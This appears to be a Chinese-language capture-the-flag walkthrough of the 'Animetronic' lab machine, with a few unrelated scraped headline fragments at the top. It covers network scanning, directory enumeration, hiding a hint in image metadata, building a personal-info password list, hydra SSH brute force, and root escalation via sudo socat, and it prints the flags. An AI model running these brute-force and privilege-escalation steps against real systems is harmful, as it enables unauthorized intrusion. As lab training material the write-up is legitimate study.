广东建设工程协会网站,自己的网站怎么做砍价,深圳深网站建设服务,个人养老金制度将出炉靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权
arp-scan
arp-scan 检测局域网中活动的主机
192.168.9.203 靶机IP地址port
通过nmap扫描#xff0c;获取目标主机的端口信息
┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.16… 靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 arp-scan
arp-scan 检测局域网中活动的主机
192.168.9.203 靶机IP地址port
通过nmap扫描获取目标主机的端口信息
┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.20322/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))url枚举
dirsearch目录扫描默认的字典扫不出来
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r[07:22:28] 301 - 312B - /img - http://192.168.9.203/img/
[07:22:33] 301 - 312B - /css - http://192.168.9.203/css/
[07:22:36] 301 - 311B - /js - http://192.168.9.203/js/
[07:38:24] 301 - 319B - /staffpages - http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 - 278B - /server-status
[############ ] 60% 134151/220545 119/s job:1/1 errors:82
[5] 已停止 dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtGet a picture,必定有鬼
wget http://192.168.9.203/staffpages/new_employees.jpgexiftool
┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg
ExifTool Version Number : 12.49
File Name : new_employees.jpeg
Directory : .
File Size : 160 kB
File Modification Date/Time : 2023:11:27 12:11:43-05:00
File Access Date/Time : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time : 2024:05:10 05:53:33-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : page for you michael : ya/HnXNzyZDGg8ed4oCyZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo
Image Width : 703
Image Height : 1136
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 703x1136
Megapixels : 0.799套中套
┌──(root㉿kali)-[~]
└─# echo ya/HnXNzyZDGg8ed4oCyZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝןCTF打多了一眼就看出是倒着的字母 message_for_michael
访问 /staffpages/message_for_michael
Hi MichaelSorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file personal_info.txt访问/staffpages/personal_info.txt
name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 Ahmed - Yasser - Adam
Hobbies: swimmingpassword
通过个人信息生成密码字典
leahcim
michael
19961019
19101996
michael1996
leahcim1996
...hydra爆破ssh
┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203[22][ssh] host: 192.168.9.203 login: michael password: leahcim1996sudo 提权
在/home目录下发现用户
michaelanimetronic:/home$ cd henry/
michaelanimetronic:/home/henry$ ls
Note.txt user.txt
michaelanimetronic:/home/henry$ cat user.txt
0833990328464efff1de6cd93067cfb7
michaelanimetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file namedaGVucnlwYXNzd29yZC50eHQK
michaelanimetronic:/home/henry$ echo aGVucnlwYXNzd29yZC50eHQK | base64 -d
henrypassword.txt
michaelanimetronic:/home/henry$ find / -name henrypassword.txt 2/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michaelanimetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam是henry的密码
michaelanimetronic:/home/henry$ su henry
Password:
henryanimetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:env_reset, mail_badpass, secure_path/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser henry may run the following commands on animetronic:(root) NOPASSWD: /usr/bin/socat
henryanimetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a
